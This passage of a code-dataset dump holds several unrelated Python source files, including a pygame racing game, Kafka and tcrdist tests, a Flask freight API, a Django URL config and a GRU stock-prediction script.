text_objects(\"2\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n \n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"1\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n \n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"GO\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n gameLoop()\n\ndef paused():\n global pause\n pygame.mixer.music.pause()\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(pause_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',80)\n ts,tr = text_objects(\"PAUSED\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n button(\"CONTINUE\",125,450,150,50,green,bright_green,\"unpause\")\n button(\"RESTART\",325,450,150,50,blue,bright_blue,\"play\")\n button(\"MAIN MENU\",525,450,200,50,red,bright_red,\"home\")\n pygame.display.update()\n clock.tick(30)\n\ndef unpaused():\n global pause\n pygame.mixer.music.unpause()\n pause = False\n\n\ndef button(msg,x,y,w,h,ic,ac,action = None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x+w > mouse[0] >x and y+h >mouse[1] > y:\n pygame.draw.rect(gd,ac,(x,y,w,h))\n if click[0] == 1 and action != None:\n if action == \"play\":\n countdown()\n elif action == \"quit\":\n pygame.quit()\n quit()\n sys.exit()\n elif action == \"instrct\":\n instruction()\n elif action == \"home\":\n intro_loop()\n elif action == \"pause\":\n paused()\n elif action == \"unpause\":\n unpaused()\n\n \n else:\n pygame.draw.rect(gd,ic,(x,y,w,h))\n smalltext = pygame.font.Font(\"freesansbold.ttf\",20)\n textsurf,textrect = text_objects(msg,smalltext)\n textrect.center = ((x+(w/2)),(y+(h/2)))\n gd.blit(textsurf,textrect)\n\n\n\n\n\ndef instruction():\n instruction = True\n while instruction:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(instrct_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',80)\n mediumtext = pygame.font.Font('freesansbold.ttf',60)\n smalltext = pygame.font.Font('freesansbold.ttf',20)\n textSurf,textRect = text_objects(\"City Racing is a 2d racing game made for entertainment.\",smalltext)\n textRect.center = (400,180)\n ts,tr = text_objects(\"The game is consist of many levels with increasing speed.\",smalltext)\n tr.center = (400,210)\n TextSurf,TextRect = text_objects(\"INSTRUCTIONS\",largetext)\n TextRect.center = (400,100)\n gd.blit(ts,tr)\n gd.blit(TextSurf,TextRect)\n gd.blit(textSurf,textRect)\n stextSurf,stextRect = text_objects(\"Left Arrow : TURN LEFT\",smalltext)\n stextRect = (15,350)\n htextSurf,htextRect = text_objects(\"Right Arrow : TURN RIGHT\",smalltext)\n htextRect = (15,400)\n atextSurf,atextRect = text_objects(\"Press A : ACCELERATION\",smalltext)\n atextRect = (520,350)\n btextSurf,btextRect = text_objects(\"Press B : BRAKE\",smalltext)\n btextRect = (520,400)\n ptextSurf,ptextRect = text_objects(\"Press P : PAUSE\",smalltext)\n ptextRect = (15,450)\n ctextSurf,ctextRect = text_objects(\"CONTROLS\",mediumtext)\n ctextRect.center = (400,275)\n gd.blit(stextSurf,stextRect)\n gd.blit(htextSurf,htextRect)\n gd.blit(atextSurf,atextRect)\n gd.blit(btextSurf,btextRect)\n 
gd.blit(ptextSurf,ptextRect)\n gd.blit(ctextSurf,ctextRect)\n button(\"Back\",350,500,100,50,blue,bright_blue,\"home\")\n pygame.display.update()\n clock.tick(30)\n\n\n\n\n\ndef obstacle(obs_startx,obs_starty,obs):\n if obs == 0:\n obs_pic = pygame.image.load(\"c1.png\")\n elif obs == 1:\n obs_pic = pygame.image.load(\"c2.png\")\n elif obs == 2:\n obs_pic = pygame.image.load(\"c4.png\")\n elif obs == 3:\n obs_pic = pygame.image.load(\"c-6.png\")\n elif obs == 4:\n obs_pic = pygame.image.load(\"c-7.png\")\n gd.blit(obs_pic,(obs_startx,obs_starty)) \n\ndef score_system(passed,score):\n font = pygame.font.Font(\"freesansbold.ttf\",20)\n text = font.render(\"CAR PASSED :\"+str(passed),True,black)\n score = font.render(\"SCORE :\"+str(score),True,red)\n gd.blit(text,(0,60))\n gd.blit(score,(0,30))\n\ndef car(x,y):\n gd.blit(carimg,(x,y))\n\ndef bg():\n gd.blit(llane,(0,0))\n gd.blit(llane,(0,200))\n gd.blit(llane,(0,400))\n gd.blit(rlane,(700,0))\n gd.blit(rlane,(700,200))\n gd.blit(rlane,(700,400))\n \n # gd.blit(bgimg,(0,0))\n\ndef text_objects(text,font):\n textsurface = font.render(text,True,black)\n return textsurface,textsurface.get_rect()\n\ndef msg_display(text):\n lt = pygame.font.Font(\"freesansbold.ttf\",50)\n textsurf,textrect = text_objects(text,lt)\n textrect.center = ((window_width/2),(window_height/2))\n gd.blit(textsurf,textrect)\n pygame.display.update()\n time.sleep(3)\n gameLoop()\n\ndef crash():\n pygame.mixer.Sound.play(crash_sound)\n pygame.mixer.music.stop()\n msg_display(\"CAR CRASHED\") \n\ndef horn():\n # pygame.mixer.Sound.stop(car_sound)\n pygame.mixer.Sound.play(horn_sound)\n pygame.mixer.Sound.stop(horn_sound)\n # pygame.mixer.Sound.play(car_sound)\n\ndef gameLoop():\n global pause\n x = (window_width*0.45)\n y = (window_height*0.8)\n x_change = 0\n obs_speed = 9\n obs = 0\n y_change = 0\n obs_startx = random.randrange(200,(window_width-200))\n obs_starty = -750\n obs_width = 56\n obs_height = 125\n passed = 0\n level = 1\n score = 0\n y2 = 900\n \n bumped = False\n while not bumped:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x_change = -5\n if event.key == pygame.K_RIGHT:\n x_change = 5\n if event.key == pygame.K_a:\n obs_speed += 2\n if event.key == pygame.K_b:\n obs_speed -= 2\n if event.key == pygame.K_h:\n horn()\n \n\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n x_change = 0\n\n x += x_change\n gd.fill(gray)\n \n rel_y = y2 % bgimg.get_rect().width\n gd.blit(bgimg,(0,rel_y-bgimg.get_rect().width))\n if rel_y < 600:\n gd.blit(bgimg,(0,rel_y))\n gd.blit(bgimg,(0,rel_y+800))\n gd.blit(bgd,(0,y+600))\n gd.blit(wstrip,(240,rel_y-190))\n gd.blit(wstrip,(500,rel_y-190))\n gd.blit(y1,(335,rel_y-190))\n gd.blit(yy2,(135,rel_y-190))\n gd.blit(y3,(600,rel_y-190))\n # gd.blit(bgimg,(0,rel_y-600))\n # gd.blit(bgimg,(0,rel_y-500))\n # gd.blit(bgimg,(0,rel_y-400))\n # gd.blit(bgimg,(0,rel_y-300))\n # gd.blit(bgimg,(0,rel_y-200))\n # gd.blit(bgimg,(0,rel_y-100))\n # gd.blit(bgimg,(0,rel_y-50))\n # gd.blit(bgimg,(0,rel_y-25))\n # gd.blit(bgimg,(0,rel_y-12))\n # gd.blit(bgd,(140,rel_y))\n # gd.blit(bgd,(140,rel_y+100))\n # gd.blit(bgd,(140,rel_y+200))\n # gd.blit(bgd,(140,rel_y+300))\n # gd.blit(bgd,(140,rel_y+400))\n \n y2 += obs_speed\n\n bg()\n obs_starty -=(obs_speed/4)\n obstacle(obs_startx,obs_starty,obs)\n obs_starty += obs_speed\n car(x,y)\n score_system(passed,score)\n font = 
pygame.font.Font(\"freesansbold.ttf\",20)\n l = font.render(\"LEVEL :\"+str(level),True,red)\n gd.blit(l,(0,90))\n button(\"Back\",30,500,100,50,blue,bright_blue,\"home\")\n pygame.mixer.Sound.play(car_sound)\n \n if x > 680-car_width or x < 140:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n if x > window_width-(car_width+110) or x < 110:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n if obs_starty > window_height:\n obs_starty = 0 - obs_height\n obs_startx = random.randrange(170,(window_width-170))\n obs = random.randrange(0,5)\n passed += 1\n score = passed*10\n if passed%10 == 0:\n level += 1\n obs_speed += 2\n lt = pygame.font.Font(\"freesansbold.ttf\",50)\n textsurf,textrect = text_objects(\"LEVEL \"+str(level),lt)\n textrect.center = ((window_width/2),(window_height/2))\n gd.blit(textsurf,textrect)\n pygame.display.update()\n time.sleep(3)\n \n if y < obs_starty + obs_height:\n if x > obs_startx and x < obs_startx + obs_width or x+car_width > obs_startx and x+car_width < obs_startx+obs_width:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n \n button(\"Pause\",675,0,100,50,green,bright_green,\"pause\")\n pygame.display.update()\n clock.tick(60)\n\nintro_loop()\ngameLoop()\npygame.quit()\nquit()","repo_name":"ram-birla/car-race","sub_path":"race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":12640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433147113","text":"\n\n\n\ndef test_example_tree():\n \"\"\"\n An example showing how to create an interactive\n tree from a sample of mouse TCRs \n \"\"\"\n import os\n import pandas as pd\n from tcrdist.repertoire import TCRrep\n from tcrdist.tree import TCRtree\n\n df = pd.read_csv(\"dash.csv\").sample(100, random_state=1).reset_index(drop = True)\n\n tr = TCRrep(cell_df = df, \n organism = 'mouse', \n chains = ['beta'], \n db_file = 'alphabeta_gammadelta_db.tsv')\n\n tcrtree = TCRtree(tcrrep = tr, \n html_name = 'dash.mouse.b.tree.html')\n\n tcrtree.build_tree()\n\n assert os.path.isfile('dash.mouse.b.tree.html')","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/tests/test_example_13.py","file_name":"test_example_13.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"32012704765","text":"\nimport unittest\nfrom app import parse_cli_args\nfrom unittest.mock import Mock, patch\nimport app\n\nclass TestKafka(unittest.TestCase):\n\n def setup_ArgumentParser(self):\n print(\"testing parse_args_with_arguments: {'channel':'test-channel','server':'test-server'}\")\n response_args = Mock()\n response_args.parse_args.return_value = {'channel':'test-channel','server':'test-server'}\n return response_args\n\n def log_add_argument(self): \n response = Mock() \n response.add_argument.return_value = print(\"add_argument_called\") \n return response \n\n def setup_producer_object(self,server):\n prodObject = Mock()\n prodObject.produce.return_value = print(\"produced encoded message to test-topic \")\n prodObject.flush.return_value = \"flushed topic\"\n return prodObject\n\n def setup_poll(self,value):\n pollObj = Mock()\n pollObj.error.return_value = False\n pollObj.value.side_effect = KeyboardInterrupt\n return pollObj\n\n def setup_consumer_object(self,server):\n consumeObject = Mock()\n consumeObject.subscribe.return_value = print(\"produced encoded message to test-topic \")\n consumeObject.poll.side_effect = self.setup_poll\n consumeObject.close.return_value = 
\"closed consumer\"\n return consumeObject\n\n def mock_inpt(self,text,count):\n mock_input = Mock()\n mock_input.return_value = \"q\" if count > 0 else \"er\"\n return mock_input.return_value \n\n def test_read_args_with_no_arguments(self):\n with self.assertRaises(SystemExit):\n parse_cli_args()\n\n @patch('builtins.print') #test a print\n @patch('app.argparse') \n def test_add_argument(self,mock_argparse,mock_print): \n mock_argparse.ArgumentParser.side_effect = self.log_add_argument\n parse_cli_args() \n mock_print.assert_called_with('add_argument_called')\n \n\n @patch('app.argparse') \n def test_parse_args_with_arguments(self,mock_argparse): \n mock_argparse.ArgumentParser.side_effect = self.setup_ArgumentParser\n assert parse_cli_args()['channel'] == 'test-channel'\n\n @patch('builtins.print') \n @patch('app.ck')\n @patch('app.get_input') \n def test_Producer(self,mock_input,mock_producer,mock_produce):\n mock_producer.Producer.side_effect = self.setup_producer_object \n mock_input.side_effect = self.mock_inpt\n app.produce_message('test-topic','test-server') \n mock_produce.assert_called_with('Chat CLI')\n mock_produce.assert_called() \n\n @patch('builtins.print') \n @patch('app.ck') \n def test_consumer(self,mock_consumer,mock_consume):\n mock_consumer.Consumer.side_effect = self.setup_consumer_object \n app.consume_message('latest','test-server','test-topic') \n mock_consume.assert_called()\n\n @patch('builtins.print')\n @patch('app.ck') \n def test_msg_error_when_None(self,mock_consumer,mock_print): \n pass\n\n def test_consumer_close(self):\n pass\n# @patch('app.Producer') \n# @patch('app.produce_message')\n# def test_produce_message(self,mock_producer,mockProducer): \n# mockProducer.return_value = 2 \n# app.produce_message('test-event','localhost:9092')\n# mock_producer.assert_called_once() \n# mock_producer.assert_called_with('test-event','localhost:9092') \n# self.assertTrue(2, mockProducer)\n\n# @patch('app.Producer.produce') \n# @patch('app.Producer') \n# @patch('app.produce_actions')\n# def test_produce_actions(self,mock_produce,mockProducer,pp): \n# app.produce_actions(mockProducer,'test-event','hey')\n# mock_produce.assert_called_once() \n# print(pp) \n\n\n# testproduce = mockProducer.produce('test-event','hey')\n# #testproduce.assert_called_once() \n \n# @patch('app.consume_message')\n# def test_consume_message(self,mock_consumer):\n# app.consume_message('start','test-event','localhost:9092')\n# mock_consumer.assert_called_once() \n# mock_consumer.assert_called_once_with('start','test-event','localhost:9092')\n \n\n# #set .side_effect to a function that Mock will invoke when you call your mocked method.\n# def logger(self, err, msg):\n# if err is not None:\n# print('Message delivery error: {}'.format(err))\n# return 'error logged'\n# else:\n# print('Message {} delivered to topic'.format(msg))\n\n# return 'message logged'\n\n# @patch('app.delivery_report') \n# def test_delivery_report_logging(self,mock_delivery):\n# # Test a successful, logged request\n# mock_delivery.side_effect = self.logger('error','hey')\n# assert app.delivery_report() != 'error logged'\n# mock_delivery.side_effect = self.logger(None,'hey')\n# assert app.delivery_report() != 'message logged' \n\nif __name__=='__main__': \n unittest.main()\n \n ","repo_name":"MarkTLite/chat-cli-kafka","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"41456514579","text":"#\n# @lc app=leetcode id=172 lang=python3\n#\n# [172] Factorial Trailing Zeroes\n#\n\n\nclass Solution:\n def trailingZeroes(self, n: int) -> int:\n\n count = 0\n\n for i in range(1, 17):\n\n count += n//(5**i)\n\n return count\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython/172.factorial-trailing-zeroes.py","file_name":"172.factorial-trailing-zeroes.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70494188392","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nfrom os.path import isfile\nimport os\nimport sys\nimport time\nimport signal\nfrom datetime import datetime\n\nstopping=False\ndef stop_handler(signum, frame):\n global stopping\n print(f'{datetime.now()}: stopping mnat-ingress wrapper ({os.getpid()})')\n stopping = True\n\ndef main(args_in):\n global stopping\n parser = argparse.ArgumentParser(\n description='''\nThis runs mnat-ingress.py in the expected docker container layout.\n\nmnat-ingress monitors the mnat server for active mappings (which should\ncome from joins reported by egresses). This launches:\n - mnat-translate to translate from the upstream global to the downstream\n local addresses.\n - this launches smcroutectl to join the global (S,G) on the upstream\n interface.\n\nIn addition to launching the join upstream, mnat-ingress exports the\nactive joins in the control file. ingress-start specifies the control\nfile within the docker container as /var/run/mnat/ingress-joined.sgs,\nso that's the file that should be monitored for changes.\n\nSince this is designed as the docker entry point, it will use docker-\nspecific paths by default if they are present. This happens with:\n - /etc/mnat/ca.pem (containing a public root cert to validate the server)\n - /etc/mnat/client.pem (containing a private cert to prove identity of this client)\n - /var/run/mnat/ingress-joined.sgs (containing the upstream joined (S,G)s, which can be useful to export to ingest-mgr or cbacc-mgr)\n''')\n\n parser.add_argument('-v', '--verbose', action='count', default=0)\n parser.add_argument('-s', '--server', required=True, help='hostname of server')\n parser.add_argument('-p', '--port', help='port for h2 on server', default=443, type=int)\n parser.add_argument('-u', '--upstream-interface', help='receive interface for local network NATted traffic', required=True)\n parser.add_argument('-d', '--downstream-interface', help='transmit interface for de-NATted global traffic', required=True)\n\n args = parser.parse_args(args_in[1:])\n verbosity = None\n if args.verbose:\n verbosity = '-'+'v'*args.verbose\n\n control='/var/run/mnat/ingress-joined.sgs'\n cacert ='/etc/mnat/ca.pem'\n clientcert ='/etc/mnat/client.pem'\n\n ingress_cmd = [\n '/usr/bin/stdbuf', '-oL', '-eL', \n sys.executable, '/bin/mnat-ingress.py',\n '-i', args.upstream_interface,\n '-o', args.downstream_interface,\n '-s', args.server,\n '-p', str(args.port),\n '-f', control,\n ]\n\n if verbosity:\n ingress_cmd.append(verbosity)\n\n if isfile(cacert):\n ingress_cmd.extend([\n '--cacert', cacert,\n ])\n\n if isfile(clientcert):\n ingress_cmd.extend([\n '--cert', clientcert,\n ])\n\n os.environ[\"PYTHONUNBUFFERED\"] = \"1\"\n signal.signal(signal.SIGTERM, stop_handler)\n signal.signal(signal.SIGINT, stop_handler)\n signal.signal(signal.SIGHUP, stop_handler)\n\n ingress_p = subprocess.Popen(ingress_cmd)\n\n ingress_ret = None\n while ingress_ret is None and not stopping:\n 
ingress_ret = ingress_p.poll()\n time.sleep(1)\n\n if ingress_ret is None:\n ingress_p.send_signal(signal.SIGTERM)\n ingress_p.wait(1)\n\n return ingress_ret\n\nif __name__==\"__main__\":\n ret = main(sys.argv)\n sys.exit(ret)\n\n","repo_name":"GrumpyOldTroll/mnat","sub_path":"ingress/docker/ingress-start.py","file_name":"ingress-start.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19819940831","text":"#!/usr/bin/env python\n\nfrom flask import Flask, jsonify, make_response, request\nfrom flask_restful import Resource, Api, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nfrom os import getenv\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\napi = Api(app)\n\n## database config\nconnection = f\"mysql+pymysql://{getenv('MYSQL_ROOT_USER')}:{getenv('MYSQL_ROOT_PASSWORD')}@{getenv('MYSQL_HOST')}/freight\"\napp.config['SQLALCHEMY_DATABASE_URI'] = connection\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n## models\nclass Orgs(db.Model):\n __tablename__ = 'organizations'\n id = db.Column(db.String(64), primary_key=True)\n code = db.Column(db.String(32), default=None, nullable=False)\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\nclass Shipments(db.Model):\n __tablename__ = 'shipments'\n id = db.Column(db.String(64), primary_key=True)\n eta = db.Column(db.String(64), nullable=True, default=None)\n org_id = db.Column(db.Text, nullable=True, default=None)\n weight = db.Column(db.Integer, nullable=True, default=None)\n unit = db.Column(db.String(32), nullable=True, default=None)\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\n## routes\nclass Grossweight(Resource):\n oz_per_lb = 16\n oz_per_kg = 35.2739\n\n lb_per_oz = 0.0625\n lb_per_kg = 2.2046\n\n kg_per_lb = 0.4536\n kg_per_oz = 0.0284\n\n def get(self, unit):\n if not unit in ('pounds', 'ounces', 'kilograms'):\n abort(400, message=f\"{unit} not supported.\")\n\n shipments = Shipments.query.all()\n kgs = sum([i.weight for i in shipments if i.unit == 'KILOGRAMS'])\n lbs = sum([i.weight for i in shipments if i.unit == 'POUNDS'])\n ozs = sum([i.weight for i in shipments if i.unit == 'OUNCES'])\n\n if unit == 'pounds':\n total = round((kgs * self.lb_per_kg) + (ozs * self.lb_per_oz) + lbs, 3)\n if unit == 'kilograms':\n total = round((lbs * self.kg_per_lb) + (ozs * self.kg_per_oz) + kgs, 3)\n if unit == 'ounces':\n total = round((kgs * self.oz_per_kg) + (lbs * self.oz_per_lb) + ozs, 3)\n\n return make_response(jsonify(weight=total, unit=unit), 200)\n\n\nclass Organization(Resource):\n def get(self, id):\n org = Orgs.query.get(id)\n return jsonify(id=org.id, code=org.code) if org else abort(404, message=f\"{id} not found.\")\n\n\n def post(self):\n data = json.loads(request.get_json())\n id, code = data['id'], data['code']\n\n ## debugging\n app.logger.debug(f\"{data} {type(data)} --> post payload\")\n\n ## insert if org exists, else update\n org = Orgs.query.get(id)\n if org is None:\n app.logger.info(f\"org {id} does not exist\")\n new_org = Orgs(id=id, code=code)\n db.session.add(new_org)\n else:\n app.logger.info(f\"org {id} exists\")\n org.id = id\n org.code = code\n db.session.add(org)\n\n db.session.commit()\n return make_response(jsonify(data), 201)\n\n\nclass Shipment(Resource):\n def get(self, id):\n ship = Shipments.query.get(id)\n return jsonify(id=ship.id, eta=ship.eta, org_id=eval(ship.org_id), weight=ship.weight, unit=ship.unit) if ship else abort(404, 
message=f\"{id} not found.\")\n\n\n def post(self):\n data = json.loads(request.get_json())\n id = data['referenceId']\n\n ## debugging\n app.logger.debug(f\"{data} {type(data)} --> post payload\")\n\n ## substitute list of org codes with list of org ids\n org_id = repr([str(Orgs.query.filter_by(code=org).first()) for org in data['organizations']])\n\n ## some shipments will not have an eta\n eta = data.get('estimatedTimeArrival', None)\n\n ## some shipments will have no transport packs\n weight, unit = None, None\n if data['transportPacks']['nodes']:\n weight = int(data['transportPacks']['nodes'][0]['totalWeight']['weight'])\n unit = data['transportPacks']['nodes'][0]['totalWeight']['unit']\n\n ## check for existing shipment\n shipment = Shipments.query.get(id)\n if shipment is None:\n new_shipment = Shipments(id=id, eta=eta, org_id=org_id, weight=weight, unit=unit)\n db.session.add(new_shipment)\n else:\n shipment.id = id\n shipment.eta = eta\n shipment.org_id = org_id\n shipment.weight = weight\n shipment.unit = unit\n db.session.add(shipment)\n\n db.session.commit()\n return make_response(jsonify(data), 201)\n\n\napi.add_resource(Organization, '/organization', '/organization/')\napi.add_resource(Shipment, '/shipment/', '/shipment')\napi.add_resource(Grossweight, '/grossweight/', '/grossweight')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"brukshut/freight","sub_path":"freight.py","file_name":"freight.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27724048528","text":"# Learning about if\n# Place your name here\n\n# Get a string from the user\nuser_input = input(\"Please enter an integer: \")\nif not user_input.isnumeric():\n print(\"that wasn't an integer you know...\")\nelse:\n print(\"thanks\")\n # Ok, let's put this into a float variable\n number1 = int(user_input)\n \n# Get a string from the user\nuser_input = input(\"Please enter another integer: \")\nif not user_input.isnumeric():\n print(\"that wasn't an integer you know...\")\nelse:\n print(\"thanks\")\n # Ok, let's put this into a float variable\n number2 = int(user_input)\n\n# Let's compare these\nif number1 > number2:\n print(\"Hmm. 
the first number was bigger\")\nelif number2 > number1:\n    print(\"the second number was bigger\")\nelse:\n    print(\"ah, nice try, they were the same\")\n\n\n    \n\n","repo_name":"profcturner/introductory-python","sub_path":"python/lab2/lab2_1.py","file_name":"lab2_1.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13890093889","text":"from django.urls import path\n\nfrom .views import (\n    WordList,\n    WordAllList,\n    WordDetail,\n    WordDeckList,\n    WordCreate,\n    WordUpdateExercise,\n    WordUpdateCorrectAnswer,\n    WordUpdateWrongAnswer,\n    WordDraw,\n    WordDelete,\n    WordUpdate,\n)\n\nurlpatterns = [\n    path(\"\", WordList.as_view(), name=\"words\"),\n    path(\"deck//\", WordDeckList.as_view(), name=\"words_deck\"),\n    path(\"admin/\", WordAllList.as_view(), name=\"all_words\"),\n    path(\"practice//\", WordDraw.as_view(), name=\"draw_word\"),\n    path(\"/add-exercise/\", WordUpdateExercise.as_view(), name=\"add_exercise\"),\n    path(\n        \"/correct-answer/\",\n        WordUpdateCorrectAnswer.as_view(),\n        name=\"add_correct_answer\",\n    ),\n    path(\n        \"/wrong-answer/\",\n        WordUpdateWrongAnswer.as_view(),\n        name=\"add_wrong_answer\",\n    ),\n    path(\"/\", WordDetail.as_view(), name=\"word\"),\n    path(\"/update/\", WordUpdate.as_view(), name=\"word_update\"),\n    path(\"/create//\", WordCreate.as_view(), name=\"word_create\"),\n    path(\"/delete/\", WordDelete.as_view(), name=\"word_delete\"),\n]\n","repo_name":"Gamattowicz/Flashcard","sub_path":"words/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73122030953","text":"import numpy as np\n\nfrom cpu import opcodes\nfrom cpu import addr_modes\n\nclass cpu:\n\t\n\t# constructor\n\tdef __init__(self):\n\n\t\t# registers\n\t\tself.acc = 0x00\n\t\tself.x = 0x00\n\t\tself.y = 0x00\n\t\tself.pc = 0x0000\n\t\tself.stack_pointer = 0x00\n\n\t\tself.ram = [0] * 0x10000  # addresses 0x0000-0xFFFF inclusive\n\t\tself.addr_abs = 0x00\n\t\tself.addr_rel = 0x00\n\t\t\n\t\t\t\n\t\t# status flags\n\t\tself.flags = {\n\t\t\t\"C\": False,\n\t\t\t\"Z\": False,\n\t\t\t\"I\": False,\n\t\t\t\"D\": False,\n\t\t\t\"B\": False,\n\t\t\t\"V\": False,\n\t\t\t\"N\": False\n\t\t}\n\t\tself.opcode = opcodes.opcodes()\n\n\t# addressing modes\n\t\n\n\tdef check_op(self, i):\n\t\tif i == 0x00:\n\t\t\tprint('hit the BRK opcode')\n\t\telif i == 0x78:\n\t\t\tself.opcode.SEI(self)\n\t\telse:\n\t\t\tprint('unexpected opcode')\n\t\n\tdef read(self, addr):\n\t\tif addr < 0x0000 or addr > 0xFFFF:\n\t\t\tprint('addr out of bounds')\n\t\telse:\n\t\t\treturn self.ram[addr]\n\n\tdef write(self, addr, data):\n\t\tif addr < 0x0000 or addr > 0xFFFF:\n\t\t\tprint('addr out of bounds')\n\t\telse:\n\t\t\tself.ram[addr] = data\n\n\t","repo_name":"Loernius/nespyemu","sub_path":"cpu/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7431239793","text":"import numpy\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport tensorflow as tf\r\nfrom keras import Sequential\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix,\\\r\n    classification_report, max_error, mean_absolute_error, mean_squared_error\r\nfrom keras.layers import LSTM, Dense, RNN, GRU, Dropout\r\nfrom keras.optimizers import SGD, Adam\r\nimport math\r\nfrom 
sklearn.metrics import mean_squared_error\r\nimport datetime\r\nimport tensorboard\r\nimport pickle\r\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=\"./GRUlogsCLassification\")\r\ndf = pd.read_csv(\"DataFrame.csv\")\r\ndf = df.drop(\"Type\", axis=1)\r\ndf[\"Time\"] = pd.to_datetime(df['Time'])\r\n\r\ndf1 = df.reset_index()['close']\r\nprint(df1.describe)\r\n\r\n\r\nscalar = MinMaxScaler(feature_range=(0, 1))\r\ndf1 = scalar.fit_transform(np.array(df1).reshape(-1, 1))\r\ntraining_size=int(len(df1)*0.85)\r\ntest_size = len(df1)-training_size\r\ntrain_data, test_data = df1[0:training_size, :], df1[training_size:len(df1), :1]\r\n\r\nprint(training_size, test_size)\r\n\r\n\r\ndef create_dataset(dataset, time_step=100):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-time_step-1):\r\n a = dataset[i:(i+time_step), 0]\r\n dataX.append(a)\r\n dataY.append(dataset[i + time_step, 0])\r\n return numpy.array(dataX), numpy.array(dataY)\r\n\r\n\r\ntime_step = 100\r\nX_train, y_train = create_dataset(train_data, time_step)\r\nX_test, ytest = create_dataset(test_data, time_step)\r\n\r\nX_train = X_train.reshape(X_train.shape[0], X_train.shape[1], 1)\r\nX_test = X_test.reshape(X_test.shape[0], X_test.shape[1], 1)\r\nregressorGRU = Sequential()\r\n# First GRU layer with Dropout regularisation\r\nregressorGRU.add(GRU(units=50, return_sequences=True, input_shape=(X_train.shape[1], 1), activation='tanh'))\r\nregressorGRU.add(Dropout(0.3))\r\n# Second GRU layer\r\nregressorGRU.add(GRU(units=50, return_sequences=True, input_shape=(X_train.shape[1], 1), activation='relu'))\r\nregressorGRU.add(Dropout(0.3))\r\n# Third GRU layer\r\nregressorGRU.add(GRU(units=64, activation='tanh'))\r\nregressorGRU.add(Dropout(0.2))\r\n# The output layer\r\nregressorGRU.add(Dense(units=1))\r\n\r\nregressorGRU.compile(optimizer=Adam(), loss='mean_absolute_error')\r\n\r\n# fitting the model\r\n\r\nregressorGRU.fit(X_train, y_train, epochs=80, batch_size=10, validation_split=0.15, callbacks=[tensorboard_callback])\r\n\r\n\r\npredicted_with_gru = regressorGRU.predict(X_test)\r\npredicted_with_gru = scalar.inverse_transform(predicted_with_gru)\r\n# regressorGRU.save(\"GRUCLASS.h5\")\r\n\r\n\r\ndef plot_predictions(test, predicted):\r\n plt.plot(test, color=\"red\", label=\"realstock price\")\r\n plt.plot(predicted, color=\"blue\", label=\"predicted stock price\")\r\n plt.title(\"stock price prediction\")\r\n plt.xlabel(\"time\")\r\n plt.ylabel(\"stock price\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef return_rmse(test, predicted):\r\n rmse = math.sqrt(mean_squared_error(test, predicted))\r\n print(\"the root mean squared error is : {}.\".format(rmse))\r\n\r\n\r\ntrain_predict = 